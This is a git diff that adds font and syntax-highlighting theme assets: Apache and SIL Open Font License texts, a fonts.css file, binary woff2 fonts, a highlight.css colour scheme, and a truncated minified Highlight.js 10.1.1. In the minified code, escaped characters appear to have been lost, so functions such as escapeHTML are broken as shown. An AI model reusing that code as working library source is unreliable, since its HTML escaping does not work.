+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt b/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt
new file mode 100644
index 000000000..366206f54
--- /dev/null
+++ b/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt
@@ -0,0 +1,93 @@
+Copyright 2010, 2012 Adobe Systems Incorporated (http://www.adobe.com/), with Reserved Font Name 'Source'. All Rights Reserved. Source is a trademark of Adobe Systems Incorporated in the United States and/or other countries.
+
+This Font Software is licensed under the SIL Open Font License, Version 1.1.
+This license is copied below, and is also available with a FAQ at:
+http://scripts.sil.org/OFL
+
+
+-----------------------------------------------------------
+SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
+-----------------------------------------------------------
+
+PREAMBLE
+The goals of the Open Font License (OFL) are to stimulate worldwide
+development of collaborative font projects, to support the font creation
+efforts of academic and linguistic communities, and to provide a free and
+open framework in which fonts may be shared and improved in partnership
+with others.
+
+The OFL allows the licensed fonts to be used, studied, modified and
+redistributed freely as long as they are not sold by themselves. The
+fonts, including any derivative works, can be bundled, embedded,
+redistributed and/or sold with any software provided that any reserved
+names are not used by derivative works. The fonts and derivatives,
+however, cannot be released under any other type of license. The
+requirement for fonts to remain under this license does not apply
+to any document created using the fonts or their derivatives.
+
+DEFINITIONS
+"Font Software" refers to the set of files released by the Copyright
+Holder(s) under this license and clearly marked as such. This may
+include source files, build scripts and documentation.
+
+"Reserved Font Name" refers to any names specified as such after the
+copyright statement(s).
+
+"Original Version" refers to the collection of Font Software components as
+distributed by the Copyright Holder(s).
+
+"Modified Version" refers to any derivative made by adding to, deleting,
+or substituting -- in part or in whole -- any of the components of the
+Original Version, by changing formats or by porting the Font Software to a
+new environment.
+
+"Author" refers to any designer, engineer, programmer, technical
+writer or other person who contributed to the Font Software.
+
+PERMISSION & CONDITIONS
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of the Font Software, to use, study, copy, merge, embed, modify,
+redistribute, and sell modified and unmodified copies of the Font
+Software, subject to the following conditions:
+
+1) Neither the Font Software nor any of its individual components,
+in Original or Modified Versions, may be sold by itself.
+
+2) Original or Modified Versions of the Font Software may be bundled,
+redistributed and/or sold with any software, provided that each copy
+contains the above copyright notice and this license. These can be
+included either as stand-alone text files, human-readable headers or
+in the appropriate machine-readable metadata fields within text or
+binary files as long as those fields can be easily viewed by the user.
+
+3) No Modified Version of the Font Software may use the Reserved Font
+Name(s) unless explicit written permission is granted by the corresponding
+Copyright Holder. This restriction only applies to the primary font name as
+presented to the users.
+
+4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
+Software shall not be used to promote, endorse or advertise any
+Modified Version, except to acknowledge the contribution(s) of the
+Copyright Holder(s) and the Author(s) or with their explicit written
+permission.
+
+5) The Font Software, modified or unmodified, in part or in whole,
+must be distributed entirely under this license, and must not be
+distributed under any other license. The requirement for fonts to
+remain under this license does not apply to any document created
+using the Font Software.
+
+TERMINATION
+This license becomes null and void if any of the above conditions are
+not met.
+
+DISCLAIMER
+THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
+OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
+DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
+OTHER DEALINGS IN THE FONT SOFTWARE.
diff --git a/theme/fonts/fonts.css b/theme/fonts/fonts.css
new file mode 100644
index 000000000..858efa598
--- /dev/null
+++ b/theme/fonts/fonts.css
@@ -0,0 +1,100 @@
+/* Open Sans is licensed under the Apache License, Version 2.0. See http://www.apache.org/licenses/LICENSE-2.0 */
+/* Source Code Pro is under the Open Font License. See https://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&id=OFL */
+
+/* open-sans-300 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: normal;
+ font-weight: 300;
+ src: local('Open Sans Light'), local('OpenSans-Light'),
+ url('open-sans-v17-all-charsets-300.woff2') format('woff2');
+}
+
+/* open-sans-300italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: italic;
+ font-weight: 300;
+ src: local('Open Sans Light Italic'), local('OpenSans-LightItalic'),
+ url('open-sans-v17-all-charsets-300italic.woff2') format('woff2');
+}
+
+/* open-sans-regular - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: normal;
+ font-weight: 400;
+ src: local('Open Sans Regular'), local('OpenSans-Regular'),
+ url('open-sans-v17-all-charsets-regular.woff2') format('woff2');
+}
+
+/* open-sans-italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: italic;
+ font-weight: 400;
+ src: local('Open Sans Italic'), local('OpenSans-Italic'),
+ url('open-sans-v17-all-charsets-italic.woff2') format('woff2');
+}
+
+/* open-sans-600 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: normal;
+ font-weight: 600;
+ src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'),
+ url('open-sans-v17-all-charsets-600.woff2') format('woff2');
+}
+
+/* open-sans-600italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: italic;
+ font-weight: 600;
+ src: local('Open Sans SemiBold Italic'), local('OpenSans-SemiBoldItalic'),
+ url('open-sans-v17-all-charsets-600italic.woff2') format('woff2');
+}
+
+/* open-sans-700 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: normal;
+ font-weight: 700;
+ src: local('Open Sans Bold'), local('OpenSans-Bold'),
+ url('open-sans-v17-all-charsets-700.woff2') format('woff2');
+}
+
+/* open-sans-700italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: italic;
+ font-weight: 700;
+ src: local('Open Sans Bold Italic'), local('OpenSans-BoldItalic'),
+ url('open-sans-v17-all-charsets-700italic.woff2') format('woff2');
+}
+
+/* open-sans-800 - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: normal;
+ font-weight: 800;
+ src: local('Open Sans ExtraBold'), local('OpenSans-ExtraBold'),
+ url('open-sans-v17-all-charsets-800.woff2') format('woff2');
+}
+
+/* open-sans-800italic - latin_vietnamese_latin-ext_greek-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Open Sans';
+ font-style: italic;
+ font-weight: 800;
+ src: local('Open Sans ExtraBold Italic'), local('OpenSans-ExtraBoldItalic'),
+ url('open-sans-v17-all-charsets-800italic.woff2') format('woff2');
+}
+
+/* source-code-pro-500 - latin_vietnamese_latin-ext_greek_cyrillic-ext_cyrillic */
+@font-face {
+ font-family: 'Source Code Pro';
+ font-style: normal;
+ font-weight: 500;
+ src: url('source-code-pro-v11-all-charsets-500.woff2') format('woff2');
+}
diff --git a/theme/fonts/open-sans-v17-all-charsets-300.woff2 b/theme/fonts/open-sans-v17-all-charsets-300.woff2
new file mode 100644
index 000000000..9f51be370
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-300.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-300italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-300italic.woff2
new file mode 100644
index 000000000..2f5454484
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-300italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-600.woff2 b/theme/fonts/open-sans-v17-all-charsets-600.woff2
new file mode 100644
index 000000000..f503d558d
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-600.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-600italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-600italic.woff2
new file mode 100644
index 000000000..c99aabe80
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-600italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-700.woff2 b/theme/fonts/open-sans-v17-all-charsets-700.woff2
new file mode 100644
index 000000000..421a1ab25
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-700.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-700italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-700italic.woff2
new file mode 100644
index 000000000..12ce3d20d
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-700italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-800.woff2 b/theme/fonts/open-sans-v17-all-charsets-800.woff2
new file mode 100644
index 000000000..c94a223b0
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-800.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-800italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-800italic.woff2
new file mode 100644
index 000000000..eed7d3c63
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-800italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-italic.woff2 b/theme/fonts/open-sans-v17-all-charsets-italic.woff2
new file mode 100644
index 000000000..398b68a08
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-italic.woff2 differ
diff --git a/theme/fonts/open-sans-v17-all-charsets-regular.woff2 b/theme/fonts/open-sans-v17-all-charsets-regular.woff2
new file mode 100644
index 000000000..8383e94c6
Binary files /dev/null and b/theme/fonts/open-sans-v17-all-charsets-regular.woff2 differ
diff --git a/theme/fonts/source-code-pro-v11-all-charsets-500.woff2 b/theme/fonts/source-code-pro-v11-all-charsets-500.woff2
new file mode 100644
index 000000000..722245682
Binary files /dev/null and b/theme/fonts/source-code-pro-v11-all-charsets-500.woff2 differ
diff --git a/theme/highlight.css b/theme/highlight.css
new file mode 100644
index 000000000..a9559c210
--- /dev/null
+++ b/theme/highlight.css
@@ -0,0 +1,84 @@
+/*
+ * An increased contrast highlighting scheme loosely based on the
+ * "Base16 Atelier Dune Light" theme by Bram de Haan
+ * (http://atelierbram.github.io/syntax-highlighting/atelier-schemes/dune)
+ * Original Base16 color scheme by Chris Kempson
+ * (https://github.com/chriskempson/base16)
+ */
+
+/* Comment */
+.hljs-comment,
+.hljs-quote {
+ color: #575757;
+}
+
+/* Red */
+.hljs-variable,
+.hljs-template-variable,
+.hljs-attribute,
+.hljs-attr,
+.hljs-tag,
+.hljs-name,
+.hljs-regexp,
+.hljs-link,
+.hljs-name,
+.hljs-selector-id,
+.hljs-selector-class {
+ color: #d70025;
+}
+
+/* Orange */
+.hljs-number,
+.hljs-meta,
+.hljs-built_in,
+.hljs-builtin-name,
+.hljs-literal,
+.hljs-type,
+.hljs-params {
+ color: #b21e00;
+}
+
+/* Green */
+.hljs-string,
+.hljs-symbol,
+.hljs-bullet {
+ color: #008200;
+}
+
+/* Blue */
+.hljs-title,
+.hljs-section {
+ color: #0030f2;
+}
+
+/* Purple */
+.hljs-keyword,
+.hljs-selector-tag {
+ color: #9d00ec;
+}
+
+.hljs {
+ display: block;
+ overflow-x: auto;
+ background: #f6f7f6;
+ color: #000;
+ white-space: pre-wrap;
+}
+
+.hljs-emphasis {
+ font-style: italic;
+}
+
+.hljs-strong {
+ font-weight: bold;
+}
+
+.hljs-addition {
+ color: #22863a;
+ background-color: #f0fff4;
+}
+
+.hljs-deletion {
+ color: #b31d28;
+ background-color: #ffeef0;
+}
diff --git a/theme/highlight.js b/theme/highlight.js
new file mode 100644
index 000000000..18d24345b
--- /dev/null
+++ b/theme/highlight.js
@@ -0,0 +1,54 @@ +/* + Highlight.js 10.1.1 (93fd0d73) + License: BSD-3-Clause + Copyright (c) 2006-2020, Ivan Sagalaev +*/ +var hljs=function(){"use strict";function e(n){Object.freeze(n);var t="function"==typeof n;return Object.getOwnPropertyNames(n).forEach((function(r){!Object.hasOwnProperty.call(n,r)||null===n[r]||"object"!=typeof n[r]&&"function"!=typeof n[r]||t&&("caller"===r||"callee"===r||"arguments"===r)||Object.isFrozen(n[r])||e(n[r])})),n}class n{constructor(e){void 0===e.data&&(e.data={}),this.data=e.data}ignoreMatch(){this.ignore=!0}}function t(e){return e.replace(/&/g,"&").replace(//g,">").replace(/"/g,""").replace(/'/g,"'")}function r(e,...n){var t={};for(const n in e)t[n]=e[n];return n.forEach((function(e){for(const n in e)t[n]=e[n]})),t}function a(e){return e.nodeName.toLowerCase()}var i=Object.freeze({__proto__:null,escapeHTML:t,inherit:r,nodeStream:function(e){var n=[];return function e(t,r){for(var i=t.firstChild;i;i=i.nextSibling)3===i.nodeType?r+=i.nodeValue.length:1===i.nodeType&&(n.push({event:"start",offset:r,node:i}),r=e(i,r),a(i).match(/br|hr|img|input/)||n.push({event:"stop",offset:r,node:i}));return r}(e,0),n},mergeStreams:function(e,n,r){var i=0,s="",o=[];function l(){return e.length&&n.length?e[0].offset!==n[0].offset?e[0].offset"}function u(e){s+=""}function d(e){("start"===e.event?c:u)(e.node)}for(;e.length||n.length;){var g=l();if(s+=t(r.substring(i,g[0].offset)),i=g[0].offset,g===e){o.reverse().forEach(u);do{d(g.splice(0,1)[0]),g=l()}while(g===e&&g.length&&g[0].offset===i);o.reverse().forEach(c)}else"start"===g[0].event?o.push(g[0].node):o.pop(),d(g.splice(0,1)[0])}return s+t(r.substr(i))}});const s="",o=e=>!!e.kind;class l{constructor(e,n){this.buffer="",this.classPrefix=n.classPrefix,e.walk(this)}addText(e){this.buffer+=t(e)}openNode(e){if(!o(e))return;let n=e.kind;e.sublanguage||(n=`${this.classPrefix}${n}`),this.span(n)}closeNode(e){o(e)&&(this.buffer+=s)}value(){return this.buffer}span(e){this.buffer+=``}}class 
c{constructor(){this.rootNode={children:[]},this.stack=[this.rootNode]}get top(){return this.stack[this.stack.length-1]}get root(){return this.rootNode}add(e){this.top.children.push(e)}openNode(e){const n={kind:e,children:[]};this.add(n),this.stack.push(n)}closeNode(){if(this.stack.length>1)return this.stack.pop()}closeAllNodes(){for(;this.closeNode(););}toJSON(){return JSON.stringify(this.rootNode,null,4)}walk(e){return this.constructor._walk(e,this.rootNode)}static _walk(e,n){return"string"==typeof n?e.addText(n):n.children&&(e.openNode(n),n.children.forEach(n=>this._walk(e,n)),e.closeNode(n)),e}static _collapse(e){"string"!=typeof e&&e.children&&(e.children.every(e=>"string"==typeof e)?e.children=[e.children.join("")]:e.children.forEach(e=>{c._collapse(e)}))}}class u extends c{constructor(e){super(),this.options=e}addKeyword(e,n){""!==e&&(this.openNode(n),this.addText(e),this.closeNode())}addText(e){""!==e&&this.add(e)}addSublanguage(e,n){const t=e.root;t.kind=n,t.sublanguage=!0,this.add(t)}toHTML(){return new l(this,this.options).value()}finalize(){return!0}}function d(e){return e?"string"==typeof e?e:e.source:null}const g="(-?)(\\b0[xX][a-fA-F0-9]+|(\\b\\d+(\\.\\d*)?|\\.\\d+)([eE][-+]?\\d+)?)",h={begin:"\\\\[\\s\\S]",relevance:0},f={className:"string",begin:"'",end:"'",illegal:"\\n",contains:[h]},p={className:"string",begin:'"',end:'"',illegal:"\\n",contains:[h]},b={begin:/\b(a|an|the|are|I'm|isn't|don't|doesn't|won't|but|just|should|pretty|simply|enough|gonna|going|wtf|so|such|will|you|your|they|like|more)\b/},m=function(e,n,t={}){var a=r({className:"comment",begin:e,end:n,contains:[]},t);return a.contains.push(b),a.contains.push({className:"doctag",begin:"(?:TODO|FIXME|NOTE|BUG|OPTIMIZE|HACK|XXX):",relevance:0}),a},v=m("//","$"),x=m("/\\*","\\*/"),E=m("#","$");var 
_=Object.freeze({__proto__:null,IDENT_RE:"[a-zA-Z]\\w*",UNDERSCORE_IDENT_RE:"[a-zA-Z_]\\w*",NUMBER_RE:"\\b\\d+(\\.\\d+)?",C_NUMBER_RE:g,BINARY_NUMBER_RE:"\\b(0b[01]+)",RE_STARTERS_RE:"!|!=|!==|%|%=|&|&&|&=|\\*|\\*=|\\+|\\+=|,|-|-=|/=|/|:|;|<<|<<=|<=|<|===|==|=|>>>=|>>=|>=|>>>|>>|>|\\?|\\[|\\{|\\(|\\^|\\^=|\\||\\|=|\\|\\||~",SHEBANG:(e={})=>{const n=/^#![ ]*\//;return e.binary&&(e.begin=function(...e){return e.map(e=>d(e)).join("")}(n,/.*\b/,e.binary,/\b.*/)),r({className:"meta",begin:n,end:/$/,relevance:0,"on:begin":(e,n)=>{0!==e.index&&n.ignoreMatch()}},e)},BACKSLASH_ESCAPE:h,APOS_STRING_MODE:f,QUOTE_STRING_MODE:p,PHRASAL_WORDS_MODE:b,COMMENT:m,C_LINE_COMMENT_MODE:v,C_BLOCK_COMMENT_MODE:x,HASH_COMMENT_MODE:E,NUMBER_MODE:{className:"number",begin:"\\b\\d+(\\.\\d+)?",relevance:0},C_NUMBER_MODE:{className:"number",begin:g,relevance:0},BINARY_NUMBER_MODE:{className:"number",begin:"\\b(0b[01]+)",relevance:0},CSS_NUMBER_MODE:{className:"number",begin:"\\b\\d+(\\.\\d+)?(%|em|ex|ch|rem|vw|vh|vmin|vmax|cm|mm|in|pt|pc|px|deg|grad|rad|turn|s|ms|Hz|kHz|dpi|dpcm|dppx)?",relevance:0},REGEXP_MODE:{begin:/(?=\/[^/\n]*\/)/,contains:[{className:"regexp",begin:/\//,end:/\/[gimuy]*/,illegal:/\n/,contains:[h,{begin:/\[/,end:/\]/,relevance:0,contains:[h]}]}]},TITLE_MODE:{className:"title",begin:"[a-zA-Z]\\w*",relevance:0},UNDERSCORE_TITLE_MODE:{className:"title",begin:"[a-zA-Z_]\\w*",relevance:0},METHOD_GUARD:{begin:"\\.\\s*[a-zA-Z_]\\w*",relevance:0},END_SAME_AS_BEGIN:function(e){return Object.assign(e,{"on:begin":(e,n)=>{n.data._beginMatch=e[1]},"on:end":(e,n)=>{n.data._beginMatch!==e[1]&&n.ignoreMatch()}})}}),N="of and for in not or if then".split(" ");function w(e,n){return n?+n:function(e){return N.includes(e.toLowerCase())}(e)?0:1}const R=t,y=r,{nodeStream:k,mergeStreams:O}=i,M=Symbol("nomatch");return function(t){var a=[],i={},s={},o=[],l=!0,c=/(^(<[^>]+>|\t|)+|\n)/gm,g="Could not find the language '{}', did you forget to load/include a language module?";const 
h={disableAutodetect:!0,name:"Plain text",contains:[]};var f={noHighlightRe:/^(no-?highlight)$/i,languageDetectRe:/\blang(?:uage)?-([\w-]+)\b/i,classPrefix:"hljs-",tabReplace:null,useBR:!1,languages:null,__emitter:u};function p(e){return f.noHighlightRe.test(e)}function b(e,n,t,r){var a={code:n,language:e};S("before:highlight",a);var i=a.result?a.result:m(a.language,a.code,t,r);return i.code=a.code,S("after:highlight",i),i}function m(e,t,a,s){var o=t;function c(e,n){var t=E.case_insensitive?n[0].toLowerCase():n[0];return Object.prototype.hasOwnProperty.call(e.keywords,t)&&e.keywords[t]}function u(){null!=y.subLanguage?function(){if(""!==A){var e=null;if("string"==typeof y.subLanguage){if(!i[y.subLanguage])return void O.addText(A);e=m(y.subLanguage,A,!0,k[y.subLanguage]),k[y.subLanguage]=e.top}else e=v(A,y.subLanguage.length?y.subLanguage:null);y.relevance>0&&(I+=e.relevance),O.addSublanguage(e.emitter,e.language)}}():function(){if(!y.keywords)return void O.addText(A);let e=0;y.keywordPatternRe.lastIndex=0;let n=y.keywordPatternRe.exec(A),t="";for(;n;){t+=A.substring(e,n.index);const r=c(y,n);if(r){const[e,a]=r;O.addText(t),t="",I+=a,O.addKeyword(n[0],e)}else t+=n[0];e=y.keywordPatternRe.lastIndex,n=y.keywordPatternRe.exec(A)}t+=A.substr(e),O.addText(t)}(),A=""}function h(e){return e.className&&O.openNode(e.className),y=Object.create(e,{parent:{value:y}})}function p(e){return 0===y.matcher.regexIndex?(A+=e[0],1):(L=!0,0)}var b={};function x(t,r){var i=r&&r[0];if(A+=t,null==i)return u(),0;if("begin"===b.type&&"end"===r.type&&b.index===r.index&&""===i){if(A+=o.slice(r.index,r.index+1),!l){const n=Error("0 width match regex");throw n.languageName=e,n.badRule=b.rule,n}return 1}if(b=r,"begin"===r.type)return function(e){var t=e[0],r=e.rule;const a=new n(r),i=[r.__beforeBegin,r["on:begin"]];for(const n of i)if(n&&(n(e,a),a.ignore))return p(t);return 
r&&r.endSameAsBegin&&(r.endRe=RegExp(t.replace(/[-/\\^$*+?.()|[\]{}]/g,"\\$&"),"m")),r.skip?A+=t:(r.excludeBegin&&(A+=t),u(),r.returnBegin||r.excludeBegin||(A=t)),h(r),r.returnBegin?0:t.length}(r);if("illegal"===r.type&&!a){const e=Error('Illegal lexeme "'+i+'" for mode "'+(y.className||"")+'"');throw e.mode=y,e}if("end"===r.type){var s=function(e){var t=e[0],r=o.substr(e.index),a=function e(t,r,a){let i=function(e,n){var t=e&&e.exec(n);return t&&0===t.index}(t.endRe,a);if(i){if(t["on:end"]){const e=new n(t);t["on:end"](r,e),e.ignore&&(i=!1)}if(i){for(;t.endsParent&&t.parent;)t=t.parent;return t}}if(t.endsWithParent)return e(t.parent,r,a)}(y,e,r);if(!a)return M;var i=y;i.skip?A+=t:(i.returnEnd||i.excludeEnd||(A+=t),u(),i.excludeEnd&&(A=t));do{y.className&&O.closeNode(),y.skip||y.subLanguage||(I+=y.relevance),y=y.parent}while(y!==a.parent);return a.starts&&(a.endSameAsBegin&&(a.starts.endRe=a.endRe),h(a.starts)),i.returnEnd?0:t.length}(r);if(s!==M)return s}if("illegal"===r.type&&""===i)return 1;if(B>1e5&&B>3*r.index)throw Error("potential infinite loop, way more iterations than matches");return A+=i,i.length}var E=T(e);if(!E)throw console.error(g.replace("{}",e)),Error('Unknown language: "'+e+'"');var _=function(e){function n(n,t){return RegExp(d(n),"m"+(e.case_insensitive?"i":"")+(t?"g":""))}class t{constructor(){this.matchIndexes={},this.regexes=[],this.matchAt=1,this.position=0}addRule(e,n){n.position=this.position++,this.matchIndexes[this.matchAt]=n,this.regexes.push([n,e]),this.matchAt+=function(e){return RegExp(e.toString()+"|").exec("").length-1}(e)+1}compile(){0===this.regexes.length&&(this.exec=()=>null);const e=this.regexes.map(e=>e[1]);this.matcherRe=n(function(e,n="|"){for(var t=/\[(?:[^\\\]]|\\.)*\]|\(\??|\\([1-9][0-9]*)|\\./,r=0,a="",i=0;i0&&(a+=n),a+="(";o.length>0;){var 